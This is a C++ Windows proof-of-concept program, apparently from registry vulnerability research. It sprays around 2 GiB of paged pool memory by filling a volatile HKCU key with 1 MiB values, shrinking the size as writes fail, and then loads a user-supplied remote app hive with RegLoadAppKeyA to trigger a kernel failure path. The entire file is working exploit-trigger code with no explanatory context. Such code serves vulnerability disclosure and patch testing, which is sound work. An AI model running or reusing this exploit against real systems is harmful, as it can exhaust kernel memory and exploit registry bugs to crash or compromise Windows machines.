#include <Windows.h>

#include <cstdio>

int main(int argc, char **argv) {
  LSTATUS st;

  if (argc != 2) {
    printf("Usage: %s <remote hive file>\n", argv[0]);
    return 1;
  }

  //
  // Consume around 2 GiB of paged pool memory by filling up the volatile
  // storage space of the HKCU hive.
  //

  HKEY hVolatileKey;

  st = RegCreateKeyExW(HKEY_CURRENT_USER,
                       L"VolatileKey",
                       0,
                       NULL,
                       REG_OPTION_VOLATILE,
                       KEY_ALL_ACCESS,
                       NULL,
                       &hVolatileKey,
                       NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegCreateKeyExW failed with error %d\n", st);
    return 1;
  }

  CONST ULONG kMaxValueSize = 1024 * 1024;  // 1 MiB
  PBYTE chValueData = (PBYTE)malloc(kMaxValueSize);

  if (chValueData == NULL) {
    printf("malloc(%u) failed\n", kMaxValueSize);
    return 1;
  }

  memset(chValueData, 0xCC, kMaxValueSize);

  ULONG ulSprayAllocSize = kMaxValueSize, ulTotalSpraySize = 0;
  ULONG ulSprayIndex;

  printf("Spraying registry with size %u...\n", ulSprayAllocSize);

  for (ulSprayIndex = 0; ulSprayAllocSize > 8; ulSprayIndex++) {
    WCHAR wchValueName[10];
    _snwprintf_s(wchValueName, sizeof(wchValueName), L"%.8x", ulSprayIndex);

    st = RegSetValueExW(hVolatileKey,
                        wchValueName,
                        0,
                        REG_BINARY,
                        chValueData,
                        ulSprayAllocSize - 4);

    if (st == ERROR_SUCCESS) {
      ulTotalSpraySize += ulSprayAllocSize;
    } else {
      ulSprayAllocSize /= 2;
      printf("Spraying registry with size %u...\n", ulSprayAllocSize);
    }
  }

  printf("Registry sprayed with a total of 0x%x bytes\n", ulTotalSpraySize);

  //
  // Try to load the remote app hive.
  //

  HKEY hAppKey;

  st = RegLoadAppKeyA(argv[1], &hAppKey, KEY_ALL_ACCESS, 0, 0);

  if (st != ERROR_SUCCESS) {
    printf("RegLoadAppKeyA failed with error %d\n", st);
    return 1;
  }

  printf("RegLoadAppKeyA succeeded\n");

  RegCloseKey(hAppKey);
  RegCloseKey(hVolatileKey);

  return 0;
}
